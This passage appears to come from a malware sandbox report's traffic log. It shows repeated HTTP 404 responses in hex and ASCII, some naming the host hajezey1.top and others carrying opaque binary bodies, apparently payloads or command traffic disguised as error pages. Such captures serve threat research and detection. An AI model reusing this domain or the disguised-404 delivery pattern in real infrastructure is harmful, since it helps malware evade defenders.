68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 